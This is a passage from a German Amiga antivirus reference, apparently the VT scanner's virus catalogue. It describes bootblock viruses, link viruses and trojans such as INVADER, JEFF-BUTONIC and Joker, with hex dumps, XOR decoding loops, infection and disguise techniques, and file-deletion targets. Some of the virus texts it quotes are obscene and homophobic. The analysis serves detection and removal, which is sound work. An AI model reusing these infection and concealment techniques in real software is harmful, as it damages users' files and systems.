lesbaren Text zu taeuschen: 426f6f74 6c6f6164 65722062 7920496e Bootloader by In 676f2021 20283136 20466562 20313939 go ! (16 Feb 199 33290000 00000000 00000000 00000000 3).............. Im Speicher ist zu lesen: 001b0610 00014cdf 7fff4e75 4e6f7720 ......L..NuNow 49606d20 696e2074 68652033 30204765 I`m in the 30 Ge 6e657261 74696f6e 21496e67 6f206973 neration!Ingo is 20424143 4b202121 20284841 48414845 BACK !! (HAHAHE 48454849 2921444f 53000000 00000000 HEHI)!DOS....... Der BB holt in Wirklichkeit ab $70000 auf Speichermedium (bei Disk Zyl 40 Sektor 16-19) 4 Bloecke. Die ersten beiden Bloecke enthalten das Virusteil. Die restlichen beiden Bloecke enthalten den ehemaligen Original-BB. Dabei wurde ab der DOS-Kennung == INGO!! == eingetragen. Dies behindert die Vermehrung nicht, da das Virusteil erst ab $C in den Original-BB einspringt. Das Virusteil meldet sich NICHT. Vermehrung und Schaeden: Der Original-BB der eingelegten Disk wird nach $7FC00 geholt, == INGO!! == eingetragen und dann mit dem Virus-Teil nach Zyl 40 Sektor 16 ff. abgespeichert. File-Bloecke an dieser Stelle oder die BitMap (im Test passiert) werden ueberschrieben und koennen NICHT gerettet werden !! Tut mir leid. Danach wird der Bootloader in den BB geschrieben. Falls der BB-loader erkannt wurde, sollte das Gadget O-BB aktiviert werden. Sie koennen damit versuchen, den Original-BB von Zyl 40 zu holen. VT schreibt dann die Dos0-Kennung und $370 neu. Danach wird die BB-CheckSum neu berechnet. Diesen BB koennen sie dann mit Speicher-BB zurueckschreiben oder im File-Req abspeichern. Vielleicht haben Sie Glueck und ihre Disk bootet wieder. Der Fehler auf Zyl 40 kann aber NICHT behoben werden. Auf Festplatte arbeiten Sie bitte so NICHT. Holen Sie das Backup des Rigid-Bereichs hervor (das haben Sie doch oder ???) und schreiben Sie den Rigid-Bereich mit ihrer Kontroller-Software (ist mir lieber so) oder wenn es gar nicht anders geht mit VT- Restore zurueck. NEU: Ueber $6c wird eine Speicherstelle aufgezaehlt. Sobald der Wert $3000 erreicht ist, werden beim naechsten DoIo-Zugriff ab $6E000 (ist nur bei DD-Disk der Rootbereich) $1800 Bytes geschrie- ben. Die ersten $400 Bytes enthalten immer das Wort iNGo und die restlichen $1400 Bytes Speichermuell von $70400. 694e476f 694e476f 694e476f 694e476f iNGoiNGoiNGoiNGo 694e476f 694e476f 694e476f 694e476f iNGoiNGoiNGoiNGo 694e476f 694e476f 694e476f 694e476f iNGoiNGoiNGoiNGo 694e476f 694e476f 694e476f 694e476f iNGoiNGoiNGoiNGo Sollten Sie so eine Disk haben, so ist eine Rettung leider un- moeglich. Sie koennen zwar einmal Disksalv2 probieren, aber ich hatte damit NICHT viel Erfolg. Hinweis 28.11.93: Das VirusTeil verseucht auch FFS-Disketten. Da aber immer ein DOS0-BB geschrieben wird (ist ausgetestet), wird beim naechsten Schreibzugriff (z.B. copy File) die Disk- Struktur noch weiter zerstoert. - INGO BB DoIo, KickTag, KickCheckSum KS2.04: ja Fordert trackdisk.device NICHT LADS/ZEST-Clone s.u. Unterschied: DisplayAlert abgeschaltet Namensbegruendung: im BB ist zu lesen: f00f494e 474f2049 53205350 45414b49 ..INGO IS SPEAKI 4e472021 212100ff 00fc2344 45415448 NG !!!....#DEATH - INGO'S RETURN BB abcd bei $396 duerfte zur Lamer-Familie gehoeren. schreibt FUCK!! in irgendeinen Block BeginIo, KickTag, KickCheckSum, SumKickData KS2.04 nein Codiert jeden Virus-BB neu Namensbegruendung: decodiert mit eor.b d0,(a0)+ ist im Speicher zu lesen: >>INGO`S RETURN << suffer! Von INGO`S RETURN zerstoerte Bloecke in einem File sind NICHT mehr zu retten. Tut mir leid. - init_cli anderer Name: AMIGAKNIGHTVIRUS s.o. - InstSG-Trojan siehe bei Joker-Trojan - INTEL.Gag sofort loeschen Laenge: 3384 Bytes Keine verbogenen Vektoren, keine Vermehrungsroutine Im File ist uncodiert zu lesen: 54482f53 00245645 523a206c 6f616477 TH/S.$VER: loadw 62203337 2e312028 31362e31 2e393129 b 37.1 (16.1.91) 0a0d0000 776f726b 62656e63 682e6c69 ....workbench.li In Abhaengigkeit von $DFF006 wird entweder der loadwb-Befehl ausgefuehrt oder der Versuch unternommen, eine Graphik auszu- geben (blauer Hintergrund, helle Zeichnung). Ich habe auf KEINEM Rechnertyp eine SAUBERE Zeichnung gesehen. Die Weiter- arbeit ist danach nicht moeglich. VT bietet loeschen an. Bitte kopieren Sie den Original-loadwb-Befehl neu nach c . - INTERLAMER-Virus anderer Name: A.I.S.F.-Virus siehe oben - INVADER-Virus Linkvirus anderer moeglicher Name: SILESIAN-Virus Fileverlaengerung: 1200 + (0 bis 36 abhaengig von Zaehlzelle) ab KS 2.04 (wg. NewLoadSeg) Verbogene Vektoren: Open, Rename, Lock, LoadSeg, SetComment, SetProtection, NewLoadSeg Nicht Resetfest. Decodiert ist im File zu lesen: 4448 30004448 303a432f 4c4f4144 DH0.DH0:C/LOAD 57420052 414d3a3d 3d204d45 53534147 WB.RAM:== MESSAG 45203d3d 00546849 73204669 4c652049 E ==.ThIs FiLe I 7320496e 46654374 45642021 210000fa s InFeCtEd !!... 0d3c2a3e 20494e56 41444552 203c2a3e .<*> INVADER <*> 000100fb 0d3c2a3e 20494e56 41444552 .....<*> INVADER 203c2a3e 0001005a 1c53494c 45534941 <*>...Z.SILESIA 4e205649 5255532e 20202042 4f524e20 N VIRUS. BORN 3a202020 46454252 55415259 20313939 : FEBRUARY 199 35202028 43292042 5920534f 4d454f4e 5 (C) BY SOMEON 452e2e2e 00003d20 494e5641 44455260 E.....= INVADER` 5320204d 45535341 47453a20 3d0a3d3d S MESSAGE: =.== 3d3d3d3d 3d3d3d3d 3d3d3d3d 3d3d3d3d ================ 3d3d3d3d 3d0a3d20 46494e44 204d4520 =====.= FIND ME 594f5520 4c414d45 52202120 3d0a YOU LAMER ! =. Ablauf: Die obengenannten Vektoren werden verbogen. Ob das Teil schon im Speicher ist, wird ueber Open ueberprueft. Es wird nach DH0:C/LOADWB gesucht, um dieses File zuerst zu verseuchen. Mit Avail wird der Speicher ermittelt und je nach Groesse werden #54960 oder #105216 Bytes reserviert. Das Teil haengt sich hinter den 1. Hunk . Da im Normalfall erst ein Lock gesetzt wird und danach das File mit Open geoeffnet wird, kommt es sehr haeufig zu einer Doppelverseuchung. Mit einem Loop ($3F) werden ab Ende 1. Original-Hunk zurueck alle RTS gesucht und durch ein BRA.S Virusbeginn ersetzt. Ausnahme: Sollte das letzte oder vor- letzte Wort des Originalhunks ein RTS sein, so soll es mit -4 in NOP umgewandelt werden. Ein File wird NUR auf ausfuehrbar ($3F3) ueberprueft. Weitere Tests der Hunkstrukturen finden nicht statt . s.u. Sollte $DFF007 einen bestimmten Wert haben, so wird mit set- comment "ThIs FiLe..." in den Commentbereich des Files geschrieben. Sollte $DFF00A kleiner als 2 sein, so soll ins RAM eine Message geschrieben werden. Sollte eine Zaehlzelle einen bestimmten Wert erreicht haben, so wird der Fileanfang ueberschrieben: 3d20494e 56414445 52605320 204d4553 = INVADER`S MES 53414745 3a203d0a 3d3d3d3d 3d3d3d3d SAGE: =.======== 3d3d3d3d 3d3d3d3d 3d3d3d3d 3d3d3d0a ===============. 3d204649 4e44204d 4520594f 55204c41 = FIND ME YOU LA 4d455220 21203d0a 0000041c 48e78080 MER ! =.....H... Das File ist zerstoert und kann nicht gerettet werden. VT sollte ausgeben: "INVADER zerst." . Loeschen Sie bitte das File. Sollte eine Zaehlzelle den Wert $3c erreicht haben, so wird ein DisplayAlert ( <*> INVADER..) erzeugt, der nur durch einen Reset beendet werden kann. Eine Syquest war in kurzer Zeit vollstaendig verseucht und/oder zerstoert. Probleme: Das Teil behandelt 3E8-, 3F0- und 3F1-Hunks falsch. Diese Hunks werden NICHT ueberlaufen. Folge: Das Virusteil landet mitten im 3E9-Hunk. Das File ist defekt. VT sollte ausgeben: "INVADER de- fekt". Bitte loeschen Sie diese Files. Das Teil behandelt "DosFalse" unzureichend. Deshalb werden haeufig auch Files verseucht, die die reservierte Speichergroesse (s.o.) ueberschreiten. Folge: der letzte Teil des Files fehlt. Das File ist zerstoert. VT sollte melden: "INVADER defekt" oder "3F2 nicht gefunden" . Loeschen Sie diese Files. Allgemeine Hinweise: (fuer SEHR STARKE Verseuchung) Ueberlegen Sie bitte, ob es nicht sinnvoller ist, einzelne Unter- verzeichnisse ( z.B. c ) voellig neu auf die Festplatte aufzu- spielen. Falls Sie unbedingt eine Rettung durchfuehren muessen, dann gehen Sie bitte mit VT-Filerequester in die einzelnen Unterverzeichnisse Ihrer Festplatte. VT bewegt sich dann nur in dem gewaehlten Unter- verzeichnis und arbeitet schneller. Sp->File->SP und dann Unterver- zeichnis waehlen. Danach DirFTest. - IOZ-Virus Linkvirus Namensbegruendung: sonst nichts gefunden Fileverlaengerung: #512 Bytes Nicht Resetfest Ab KS2.04 Verbogene Vektoren: LoadSeg Speicherverankerung: - Loadseg wird verbogen Linkvorgang: - mit LoadSeg hinter den 1. Hunk - Filename enthaelt nicht "V", "-" oder "l" - Medium validated - 4 Block frei - File groesser #2048 Bytes - File kleiner #16384 Bytes - $3E9 wird gefunden - Suche nach RTS mit $3F-Schleife vom Hunkende zurueck. Falls genau am Ende RTS steht, dann NOP sonst BRA xy - IQ Breaker virus BB anderer Name: BadBytes3-Virus siehe oben - IRAK3-Virus BB und Link CCCP-Clone siehe oben KS1.3 ja KS2.04 ja Mehrfachlinks: ja Defekte Files: ja (Hunkstruktur defekt nur loeschen moeglich) Nur Text geaendert: 70004e75 4952414b 20332056 49524df8 p.NuIRAK 3 VIRM. 006c43fa 0018b3d6 67062356 00042c89 .lC.....g.#V..,. - IRQ-TeamV41.0 Link-Virus verlaengert ein Prg. um 1096 Bytes Einsprung nach Reset: KickTag Einsprung bei Arbeit: OldOpenLib laeuft bei mir nicht mit KS2.04 Textanzeige im CliTitel: (entschluesselt mit eor.l d0,(a0)+ addq.l #3,d0 ; fuer einen neuen Virus wird der Inhalt von d0 ueber move.l alterWert,d0 u. add.l $dff004,d0 veraendert) AmigaDOS presents:a new virus by the IRQ-TeamV41.0 entweder wird c/dir oder das erste File der startup-sequence befallen. K e i n File wird zweimal befallen. Das File darf nicht laenger als 100 000 Bytes sein. Entfernung: 1.Zeile in startup. loeschen OrigFile besorgen und neu kopieren Hinweis April 98: Ein Antivirusprogramm erkennt in dem File Design.dat (Laenge: 59484 Bytes) einen IRQ-Virus. Es handelt sich um eine FEHLERKENNUNG . - IRQ II wie IRQ I, aber die Routine auf Test schon befallen (cmpi. #$fffe6100,30(a4,d6.l) wurde verfaelscht. Das heisst: das erste File von der startup-sequence wird solange befallen, (d.h. verlaengert) bis die Disk voll ist. Nachtrag:gilt fuer IRQI+II; mit meiner FastmemKarte ist n a c h einem Reset keine Vermehrung mehr moeglich ????? Hinweis: Ich besitze ein IRQ2-File mit sechs Links Hinweis 03.09.92: Ab VT2.44 sollten mehrere IRQ2-Links ans gleiche File in einem Durchgang ausgebaut werden. Falls nein, melden Sie sich bitte. Danke - istrip-Trojan File gegen BBS Filename: istrip.bin Laenge ungepackt: 1156 Bytes Verwendet ungerade Adresse Keine verbogenen Vektoren Will user.data nach eatme.lha schreiben Empfehlung: Loeschen Decodiert mit eori.l #$11111111,(a3)+ ist im File zu lesen: 636f6e66 69670000 75706c6f 61642f65 config..upload/e 61746d65 2e6c6861 00626273 3a757365 atme.lha.bbs:use 722e6461 74610000 00000000 00000000 r.data.......... Taeuschtext in File_ID: ;...... --> ISTRIP 2.1 beta LhA turbo stripper! <-- --> There is no other stripper! Doesn't <-- --> use LhA for stripping, custom 680x0 <-- ;...... - JEFF-BUTONIC V1.31/05.11.88 PrgFileVirus 3408 Bytes DoIo, KickTag, KickCheckSum, $68 schreibt sich in die 1. Zeile der Startup-Sequence einer nicht schreibgeschuetzten Disk. Tarnnamen s.u. Die Anzahl der neuen Buchstaben wird am Ende der Startup-Sequence weg- genommen. Texte codiert mit: eori.l #$AAAAAAAA,(a0)+ Text fuer DisplayAlert: "Einen ganz wunderschönen guten Tag!" "* I am JEFF - the new Virus generation on Amiga *" "(w) by the genious BUTONIC." "V 1.31/05.11.88 - Generation Nr.00037" "Greetings to * Hackmack *,* Atlantic *, Wolfram, Frank," "Miguel, Alex, Gerlach, and to the whole Physik-LK from MPG !!" Texte fuer die Fensterleiste: "Ich brauch jetzt'n Bier!" "Stau auf Datenbus bei Speicherkilometer 128!" "Mehr Buszyklen für den Prozessor!" "Ein dreifach MITLEID für Atarist!" "BUTONIC!" "Schon die Steinzeitmenschen benutzten MS-DOS...einige sogar heut noch!" "Schon mal den Sound vom PS/2 gehört???" "PC/XT-AT: Spendenkonto 004..." "Unabhängigkeit & Selbstbestimmung für den Tastaturprozessor!" "Paula meint, Agnus sei zu dick." "IBM PC/XT: Ein Fall für den Antiquitätenhändler..." "Sag mir, ob du Assembler kannst, und ich sage dir, wer du bist." Tarnnamen: fuer RootDir: in Startup-Sequence: AddBuffers "AddBuffers 20" Add21K "Add21K " Fault "Fault 206" break "break 1 D" changetaskpri "changetaskpri 5" wait "wait " $A0 $A020 $A0A0A0 $A0A0A020 Arthus "Arthus " Helmar "Helmar " Aloisius "Aloisius " ?? $20 $2020 ?? die Erzeugung des $20-Tarnnamen ist nicht gelungen, steht aber im Virus-Prg. Nachtrag 03.03.93: Es ist ein JEFF-BUTONIC V1.31 Clone aufgetaucht. Laenge bleibt 3408 Bytes. Nur Texte geaendert. Bilden Sie sich selbst ihre Meinung. Wird von VT als JEFF-BUTONIC V1.31. erkannt. DisplayAlert-Text: Es tut mir leid es ihnen zu sagen ! *Ihr computer hat AiDS ein neuer Virus* Gemacht von Donald & Micky IM Jahre 1992 - Generation Nr.05426 Grüße gehen an : Metalwarrior - Mozart - Tiger 1 - Poge Außerdem noch an : Meinen Virus-Freund David Hasselhoff ! Texte fuer Fensterleiste: Tina zeig mir deine Votz Hey du Depp am Computer ! was is ? Hilfe die NFL-Kappen Kommen ! Redskins - Fickt euch alle !!! Evil C ! Der Vorkotzer er will nicht kotzen !! Rechtfertige er sich ! Easy and fast-- Schnebber-Pax !! Burger du Drecksack !! Popper überfährt man mit einem Chopper !! Rod Grod Med Flod !! Fuck for oil And for NLF-Deppen !! Ihr Assigen NFL-Ficker ihr seid alle schwul und dumm !! neue Dateinamen fuer das Virus-file: "D.Hasselhoff " "Jesus " "Archippus" "Philemon " "-->PAX<-- " "---->",$3E $A020 $A0A020 "NKOTB " "Ephesus" "Guardians" $2020 $2020 Nachtrag 01.08.93: Es ist ein JEFF-BUTONIC V1.31 Clone aufgetaucht. Versions_Nr. 4.55 (siehe unten) KS2.04 : ja Laenge bleibt 3408 Bytes. Nur Texte geaendert. Bilden Sie sich selbst ihre Meinung. VT bei FileTest: Wird als JEFF-BUTONIC V1.31 erkannt, da der Name codiert ist. VT bei SpeicherTest: Wird als JEFF-BUTONIC V4.55 erkannt, da der Name im Speicher decodiert ist. neue Texte: e0014cdf 7fff4ef9 00f810d4 006c1848 ..L...N......l.H 616c6c6f 20686f66 66656e74 6c696368 allo hoffentlich 2073746f 65726520 69636820 73656872 stoere ich sehr 202100ff 0034302a 20492061 6d204a45 !...40* I am JE 4646202d 20746865 206f6c64 20566972 FF - the old Vir 75732066 616d696c 7920666f 7220616e us family for an 20416d69 6761202a 00ff008c 3c287729 Amiga *....<(w) 20627920 74686520 6e696365 6c792020 by the nicely 4255544f 4e49432e 00ff0064 48562034 BUTONIC....dHV 4 2e35352f 32392e30 322e3933 202d2047 .55/29.02.93 - G 656e6572 6174696f 6e204e72 2e303030 eneration Nr.000 303100ff 001c5a4b 696c6c69 6e677320 01....ZKillings 676f746f 2a20426f 6f745820 2020202a goto* BootX * 2c2a2056 69727573 5a202020 2a2c2056 ,* VirusZ *, V 69727573 5f436865 636b6572 202c00ff irus_Checker ,.. 000c6456 69727573 636f7065 2c204d61 ..dViruscope, Ma 7573202c 20566972 75732d43 6865636b us , Virus-Check 6572202c 20566972 75732043 6f6e7472 er , Virus Contr 6f6c2061 6e642062 69672056 54202121 ol and big VT !! 00ff4aa9 01000000 48616c6c 6f206769 ..J.....Hallo gi 62206469 6520436f 6c612068 65722021 b die Cola her ! 004c6173 73206469 65204368 69707320 .Lass die Chips 726f6573 74656e20 756e6420 6e696368 roesten und nich 7420726f 7374656e 20212121 21004e69 t rosten !!!!.Ni 6d6d2064 69652042 69726e65 20776567 mm die Birne weg 20736f6e 7374206b 72616368 74732100 sonst krachts!. 57656e6e 20447520 6e696368 74207370 Wenn Du nicht sp 75727374 2064616e 6e206769 62747320 urst dann gibts 24210042 6f54694e 75432100 53636861 $!.BoTiNuC!.Scha 656d2044 69636820 44752042 616e6175 em Dich Du Banau 7365206c 61737320 65732073 61757365 se lass es sause 204a756e 67652020 2e2e2e61 62657220 Junge ...aber 6e696368 74207363 686c6170 70692e2e nicht schlappi.. 2e210057 696c6c73 74204475 204e6163 .!.Willst Du Nac 6868696c 6665206f 64657220 77617320 hhilfe oder was 6973206c 6f732020 3f004769 62206573 is los ?.Gib es 20617566 20447520 6c61686d 65722073 auf Du lahmer s 6f636b65 2e2e2e00 57657220 616e6465 ocke....Wer ande 726e2065 696e6520 47727562 65206772 rn eine Grube gr 61656274 20666165 6c6c7420 73656c62 aebt faellt selb 73742069 6e206469 6573656c 62696765 st in dieselbige 20212121 00576f20 77696c6c 73746520 !!!.Wo willste 64656e20 6a65747a 74207769 65646572 den jetzt wieder 2068696e 004b616e 6e737420 4475206d hin.Kannst Du m 616c2052 75686520 67656265 6e204475 al Ruhe geben Du 20616c74 6572204b 6e6f6368 656e2d4b alter Knochen-K 65726c20 2e2e2e00 4c696562 73742044 erl ....Liebst D 75205669 72656e2c 2064616e 6e207765 u Viren, dann we 69737320 69636820 61756368 2c207765 iss ich auch, we 72204469 63682061 6d206d65 69737465 r Dich am meiste 6e206861 73737400 0000 n hasst... neue Tarnnamen in Startup-Seq.: 4c 6f616457 42202020 20202020 00 = "LoadWB ",0 4d6f75 6e742020 00 = "Mount ",0 436c73 20202020 202000 = "Cls ",0 56 69727573 59202020 00 = "VirusY ",0 736574 636c6f63 6b206f70 74206920 00 = "setclock opt i ",0 696e66 6f2000 = "info ",0 a02000 = " ",0 a0a0 a02000 = " ",0 62656c69 782000 = "Obelix ",0 49 64656669 782000 = "Idefix ",0 41 73746572 69782020 00 = "Asterix ",0 202000 = " ",0 Nachtrag 02.08.93: Es ist ein JEFF V4.55 aufgetaucht, der mit Hunklab an SnoopDos angelinkt ist. (siehe unten bei SnoopDos-JEFF) Wurde bisher schon als HunkLab erkannt bei FileTest und RICHTIG ausgebaut. Wurde bisher schon als JEFF-Virus erkannt bei SpeicherTest. - JEFF-BUTONIC V3.00/9.2.89 PrgFileVirus Laenge: 2916 Bytes Name im Hauptverzeichnis: A0A0A0 1.Zeile in startup. A0A0A0209B41 DoIo, KickTag, KickCheckSum Vermehrung: jede nicht schreibgeschuetzte DOS-Disk mit startup Entfernung: 1.Zeile in startup loeschen File in DfX: loeschen Entschuesselungsroutine: entschluesselter Text: move.w #$013a,D0 Hi. loop: JEFF`s speaking here... move.w (A0)+,(a1) (w) by the genious BUTONIC. eori.w #$b4ed,(A1)+ usw. insgesamt ueber $270 Bytes Text dbf D0, loop Nachtrag: entdeckter Spezialfall: Auszuege erzeugt mit VT/zZyl/druck R-Zyl Bl 2 FHeader ChS: ok 0000: 00000002 00000372 00000001 00000000 .......r........ 0010: 00000374 753f2cf2 00000000 00000000 ...tu?,......... ;....nur Null 0130: 00000000 00000374 00000000 00000000 .......t........ 0140: 00000000 00000004 00000000 00000000 ................ ^^^^^^^^=Taeuschlaenge ;....nur Null 01a0: 00000000 0000014e 0000013b 00000511 .......N...;.... 01b0: 10737461 72747570 2d736571 75656e63 .startup-sequenc 01c0: 65000000 00000000 00000000 00000000 e............... 01d0: 00000000 00000000 00000000 00000000 ................ 01e0: 00000000 00000000 00000000 00000000 ................ 01f0: 00000000 00000371 00000000 fffffffd .......q........ R-Zyl Bl 4 DATA-Bl ChS: ok 0000: 00000008 00000372 00000001 0000000b .......r........ ^^^^^^^^ = 11 = wirkliche Laenge 0010: 00000000 c4404f07 a0a0a020 9b410a74 .....@O.... .A.t ^^ 0020: 2e780a00 1819999f 99860700 001f9986 .x.............. ^^^^^^ = Originalladeprogramm = t.x Ablauf: Es handelt sch um eine Spiele-Disk, bei der die startup- sequence nur aus einer Zeile mit dem Inhalt "t.x",0a - also vier Zeichen - bestand. Das Virusteil hat sich nun an den Anfang der startup gesetzt und die Filelaenge im FileHeader-Block (s.o. $372=882) NICHT geaendert. Im DataBlock (s.o. $374=884) steht aber $b = 11 . $a0,$a0,$a0,$20,$9b,$41,$0a = Virusteil = 7 "t.x",$0a = LadePrg. = 4 = 11 Es wurde mehrfach ausprobiert. Das Virusteil wird gestartet und danach wird das Spiel gestartet. SID zeigt als Filelaenge 4 an. Wird nun ED gestartet und die 1.Zeile geloescht (es wird NUR EINE Zeile geladen) und danach neu abgespeichert, so geht "t.x",0a VERLOREN !!!! Das Spiel wird nicht mehr geladen !!!!! Man kann den Virusnamen aber auch nicht einfach stehen lassen, weil dann die startup mit "Programm nicht gefunden" abgebrochen wird. Schauen Sie sich also bitte mit VT oder einem DiskMonitor (ein FileMonitor REICHT NICHT) das File Startup-Sequence genauer an. Die Blocklage der Startup- Sequence koennen Sie in BlockKette bestimmen (schalten Sie SeitenStopp ein). - JEFF-BV3.00Hunklab Fall 1: File Laenge ungepackt: 33704 Bytes An das Prg. SeekSpeed wurde mit Hunklab ein Jeff V3.00 ange- linkt. Wird im Speicher als Jeff V3 erkannt. VT bietet bei Filetest Ausbau an. Fall 2: File Laenge ungepackt: 9396 Bytes An das Prg. mount wurde mit Hunklab ein Jeff V3.00 ange- linkt. Wird im Speicher als Jeff V3 erkannt. VT bietet bei Filetest Ausbau an. - JEFF-BUTONIC V3.10 Filevirus Laenge: 2916 Bytes lesen Sie Auswirkungen unter Jeff 3.00 Programmcodeteile wurden verschoben (soll Anti-Viren-Prge wohl taeuschen ??) + codierte Texte geaendert: z.b. Sauf blos keinen Wodka! usw. Codierung weiterhin: eori.w #$b4ed,(a1)+ Ursprungprogramm: *JEFF* VIRUSKILLER Mastercruncher: 7368 entpackt: 9064 andere Namen: Jeff-Maker, Jeff-Remover taeuscht durch Texte Jeff-Suche vor, schreibt aber in Wirklich- keit JEFF 3.10 auf Disk in Df0: Virus gefunden - bitte warten Startup-Sequence desinfiziert und Virus beseitigt! usw. In diesem Prg ist JEFF V3.10 codiert [ eori.b $FF,(a0)+ ] ent- halten. - JEFF-BUTONIC V3.20 Filevirus Laenge 2900 Jeff 3.0 Clone Beweis:codierter Text gleich Die 16 gewonnenen Bytes kommen z.B. von der Adressierungsaenderung .l in .w . Das VirusPrg laeuft zwar an und verbiegt die Vektoren, aber bei einem Diskwechsel kommt der GURU. Eine Vermehrung konnte also von mir NICHT erreicht werden. Also keiner Erwaehnung wert. Leider nicht. Dieses unsichtbare File wurde auf einer A3000-HD in c gefunden. Die Startup-sequence war modifiziert und verhinderte den ordnungsgemaessen Bootvorgang. Ein 2.Fall wurde im Feb. im Fido-Netz besprochen, wobei hier aber nur ueber die Vektoren geschrieben wurde und das namentliche Nicht-Erkennen des Prg.s . Da bei einer HD der Rootblock nicht mit $6e000 gefunden werden kann, darf es gar nicht zu einer Vermehrung kommen. Ich vermute deshalb, dass ein anderes Prg. die Installierung vornimmt. Der Prg.Name ist NICHT bekannt. Stand:07.03.92 Empfehlung: SOFORT loeschen und startup-seq. ueberpruefen. - JEFF-BUTONIC V4.55 Laenge:3408 JEFF-BUTONIC-V1.31-Clone (siehe oben) - Jeffkiller V2.67 Trojan anderer Name: DIGITAL-DREAM-Inst. siehe oben - JINX-BB-Virus 1024 Bytes KickTag, KickCheckSum, SumKickData, BeginIo, Exec-Vec 5 Speicherlage: abhaengig von SysStkLower und Wert aus $DFF007 KS2.04: Ja Vermehrung: BB Decodiert mit "eori.b d0,(a0)+" ist im Speicher zu lesen: 7badaba9 7a004a49 4e580074 7261636b {...z.JINX.track 6469736b 2e646576 69636500 00000000 disk.device..... - JITR BB-Virus Cool, DoIo FastMem ja im Speicher immer ab $7ec10 Vermehrung: ueber BB Sonst keine Routine vorhanden !!!! VirusPrg. nur $200 Bytes lang. Im BB lesbar: I'm a safe virus! Don't kill me! I want to travel! And now a joke : ATARI ST This virus is a product of JITR - JiZANSi GAG ???? Laenge: 22008 Bytes GFA-Basic Keine verbogenen Vektoren Empfehlung: Sofort Loeschen Am Ende des Files ist zu lesen: 000003ea 000000a8 000000ea 06004946 ..............IF 4633325f 544f5f41 4e534953 6f727279 F32_TO_ANSISorry ;..... 466f726d 61747469 6e672063 796c2020 Formatting cyl 746f2067 6f2e5665 72696679 696e6720 to go.Verifying 2063796c 20466f72 6d617420 6661696c cyl Format fail 65643a20 54727920 61206469 66666572 ed: Try a differ 656e7420 6469736b 2e4a7573 74206b69 ent disk.Just ki 6464696e 67202d20 41505249 4c204641 dding - APRIL FA 554c5453 20212121 65786563 75746572 ULTS !!!executer ;..... 00ff000f 4746412d 42415349 43000000 ....GFA-BASIC... ;..... Nach der mitgelieferten Dok sollen damit IFF-Bilder in ANSI- Standard umgewandelt werden. In Wirklichkeit ersheint im Cli-Fenster sofort der Format- Text (s.o.) und nach einiger Zeit APRIL FAULTS (s.o.) Das HD-Licht flackert wirklich !!!! Eine Zerstoerung konnte in mehreren Versuchen NICHT festge- stellt werden. Das Teil ist nicht angelinkt, da Routinen aus dem ersten Prg-Teil angesprungen werden, sondern beide Teile wurden ZUSAMMEN (source vorhanden) entwickelt. Von solchen Programmen halte ich nichts. Anfaenger koennen dadurch zu unnoetigen Reaktionen veranlasst werden. Loeschen Sie bitte deshalb das Teil. Danke - Joker-Trojan Vermehrung und Zerstoerung Typ A: Filename: InstSG, assign usw. s.u. Laenge: 42676 Bytes Keine verbogenen Vektoren Nicht resetfest Nach der FileID soll es sich um ein Spiel-Install handeln. In Wirklichkeit wurden mit der 4EB9-Methode ein alter, gepackter VirusZ und das Trojan-Teil zusammengelinkt. VT bietet deshalb nur Loeschen an. Im entpackten Trojanteil ist zu lesen: 20200a00 54686520 4a6f6b65 72204675 ..The Joker Fu 636b6564 20596172 20486172 64646973 cked Yar Harddis 6b210a00 20202020 20202020 20202020 k!.. 20202020 20202020 20202020 20202020 20200a00 6468303a 632f6465 6c657465 ..dh0:c/delete 20646830 3a6c6962 732f0064 68303a63 dh0:libs/.dh0:c 2f64656c 65746520 6468303a 77627374 /delete dh0:wbst 61727475 702f0064 68303a63 2f64656c artup/.dh0:c/del 65746520 6468303a 6c6f6361 6c652f00 ete dh0:locale/. 6468303a 632f6465 6c657465 20646830 dh0:c/delete dh0 3a707265 66732f00 6468303a 632f6465 :prefs/.dh0:c/de 6c657465 20646830 3a646576 732f0064 lete dh0:devs/.d 68303a63 2f64656c 65746520 6468303a h0:c/delete dh0: 732f0073 79733a63 2f6d6170 75730073 s/.sys:c/mapus.s 79733a63 2f6c6f61 64776200 7379733a ys:c/loadwb.sys: 632f6c6f 636b0073 79733a63 2f656469 c/lock.sys:c/edi 74007379 733a632f 65640073 79733a63 t.sys:c/ed.sys:c 2f446973 6b646f63 746f7200 7379733a /Diskdoctor.sys: 632f436f 6e666967 4f707573 00737973 c/ConfigOpus.sys 3a632f61 6d696761 67756964 65007379 :c/amigaguide.sy 733a632f 61737369 676e0025 730a0000 s:c/assign.%s... Ablauf: Zuerst versucht sich das Teil zu vermehren (Laenge 42676) Es schreibt sich mit verschiedenen Filenamen (s.o.) nach sys:c . Danach sollen Unterverzeichnisse (s.o.) auf dh0: geloescht werden. Zum Schluss erfolgt im cli eine Textausgabe: The Joker .. (s.o.) Das Teil muss also auffallen. Bedenken Sie bitte, dass z.B. der assign-Befehl in fast jeder startup-sequence vorkommt. Typ B: Filename:Condom1.5 Laenge gepackt: 2948 Bytes Nach FileID: Condom V1.50 Check files after newer biomechanic trojan! VT bietet Loeschen an. Nach dem Entpacken sehen Sie, dass zwei Files mit der 4EB9-Methode zusammengelinkt wurden. Im 2. Link ist zu lesen: 20202020 200a0044 61204a6f 6b657220 ..Da Joker 73747269 6b656420 6f6e6365 20616761 striked once aga 696e2121 0a002020 20202020 20202020 in!!.. 20202020 20202020 20202020 20202020 2020200a 00737973 3a732f75 7365722d ..sys:s/user- 73746172 74757000 7379733a 70726566 startup.sys:pref 732f5363 7265656e 4d6f6465 00737973 s/ScreenMode.sys 3a6c6962 732f7265 71746f6f 6c732e6c :libs/reqtools.l 69627261 72790073 79733a63 2f646973 ibrary.sys:c/dis 6b646f63 746f7200 7379733a 632f646f kdoctor.sys:c/do 70757352 54007379 733a632f 6d617075 pusRT.sys:c/mapu 73007379 733a632f 61737369 676e0073 s.sys:c/assign.s 79733a63 2f64656c 65746500 7379733a ys:c/delete.sys: 732f7374 61727475 702d7365 7175656e s/startup-sequen Ablauf: KEINE Vermehrung Die Files (Namen s.o.) werden geloescht. Im cli erfolgt eine Textausgabe Da Joker .... (s.o.) - Joshua Virus BB senkrechtstehender Text Joshua (ueber Graphikroutine) BeginIo, Kickmem, KickTag, KickCheckSum, ExecVec5 - Joshua2-Virus anderer Name: Joshua3 oder Switch-Off Cold, BeginIo, ExecVec5 hat Probleme mit einem Befehl im C-SubD. von WB1.3 Bootblock jetzt verschluesselt: loop: move.b (A0),D0 eori.b #$18,D0 das eor-Byte wechselt und steht auch move.b D0,(A0)+ an $3ff des BBs. Zu erkennen ist der cmpa.l A1,A0 Joshua 2 am Ende des BBs an der Byte- bne loop folge, wobei sich aber das X je nach rts eor-Byte aendert: 